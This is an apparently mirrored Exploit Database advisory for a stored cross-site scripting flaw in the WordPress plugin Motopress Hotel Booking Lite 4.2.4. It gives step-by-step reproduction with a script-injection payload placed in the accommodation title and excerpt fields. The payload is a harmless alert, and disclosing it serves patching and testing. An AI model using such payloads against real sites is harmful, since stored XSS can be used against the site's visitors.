WordPress Plugin Motopress Hotel Booking Lite 4.2.4 – Stored Cross-Site Scripting (XSS)

• Exploit Database
• 13 阅读

• 作者： Sanjay Singh
  日期： 2022-06-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50951/

• # Exploit Title: WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - Stored Cross-Site Scripting (XSS)
  # Date: 2022-06-05
  # Exploit Author: Sanjay Singh
  # Vendor Homepage: https://motopress.com/
  # Software Link: https://downloads.wordpress.org/plugin/motopress-hotel-booking-lite.4.2.4.zip
  # Version: 4.2.4
  # Tested on: Windows/XAMPP
  ###########################################################################
  PoC:
  
  1. http://localhost/wp-admin/edit.php?post_type=mphb_room_type
  2. Click on "Add Accommodation Type".
  3. Add title payload= "><script>alert("XSS")</script>
  4. Excerpt input payload "><script>alert("XSS")</script>
  5. Click publish.
  6. Visit http://localhost/accommodations/
  7. XSS payload execute.